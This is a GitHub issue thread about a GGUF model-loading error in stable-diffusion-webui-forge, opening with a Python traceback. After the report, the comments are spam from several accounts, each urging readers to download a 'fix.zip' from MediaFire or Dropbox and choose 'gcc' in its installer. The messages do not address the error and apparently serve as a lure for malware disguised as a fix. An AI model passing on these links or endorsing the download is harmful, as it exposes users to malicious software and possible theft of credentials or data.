### ISSUE TITLE
Latest update breaks GGUF

### ISSUE THREAD

**Issue by pflky** [lllyasviel/stable-diffusion-webui-forge#1505]
Loading Model: {'checkpoint_info': {'filename': 'C:\\Stable Diffusion\\models\\Stable-diffusion\\FLUX\\flux1-dev-Q8_0.gguf', 'hash': 'b44b9b8a'}, 'additional_modules': ['C:\\Forge\\webui\\models\\VAE\\ae.safetensors', 'C:\\Forge\\webui\\models\\text_encoder\\clip_l.safetensors', 'C:\\Forge\\webui\\models\\text_encoder\\t5-v1_1-xxl-encoder-Q8_0.gguf'], 'unet_storage_dtype': None}
[Unload] Trying to free all memory for cuda:0 with 0 models keep loaded ...
Traceback (most recent call last):
  File "C:\Forge\webui\backend\loader.py", line 274, in forge_loader
    state_dicts, estimated_config = split_state_dict(sd, additional_state_dicts=additional_state_dicts)
  File "C:\Forge\webui\backend\loader.py", line 247, in split_state_dict
    sd = replace_state_dict(sd, asd, guess)
  File "C:\Forge\webui\backend\loader.py", line 203, in replace_state_dict
    asd_new[k] = asd_new[k].dequantize_as_pytorch_parameter()
  File "C:\Forge\webui\backend\operations_gguf.py", line 40, in dequantize_as_pytorch_parameter
    return torch.nn.Parameter(dequantize_tensor(self), requires_grad=False)
  File "C:\Forge\webui\backend\operations_gguf.py", line 101, in dequantize_tensor
    return gguf_cls.dequantize_pytorch(data, gguf_real_shape)
  File "C:\Forge\webui\packages_3rdparty\gguf\quants.py", line 163, in dequantize_pytorch
    blocks = cls.dequantize_blocks_pytorch(x.data, cls.block_size, cls.type_size, x.parent)
  File "C:\Forge\webui\packages_3rdparty\gguf\quants.py", line 621, in dequantize_blocks_pytorch
    d = parent.quant_state_0
AttributeError: 'NoneType' object has no attribute 'quant_state_0'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Forge\webui\modules_forge\main_thread.py", line 30, in work
    self.result = self.func(*self.args, **self.kwargs)
  File "C:\Forge\webui\modules\txt2img.py", line 112, in txt2img_function
    processed = processing.process_images(p)
  File "C:\Forge\webui\modules\processing.py", line 799, in process_images
    p.sd_model, just_reloaded = forge_model_reload()
  File "C:\Forge\system\python\lib\site-packages\torch\utils\_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "C:\Forge\webui\modules\sd_models.py", line 501, in forge_model_reload
    sd_model = forge_loader(state_dict, additional_state_dicts=additional_state_dicts)
  File "C:\Forge\system\python\lib\site-packages\torch\utils\_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "C:\Forge\webui\backend\loader.py", line 276, in forge_loader
    raise ValueError('Failed to recognize model type!')
ValueError: Failed to recognize model type!
Failed to recognize model type!

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by susmaxxing** [comment]
> Download https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file In the installer menu, select "gcc."

swing and a miss
![image](https://github.com/user-attachments/assets/c7a86746-86a9-4d01-b5a7-1e62b4702ede)

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
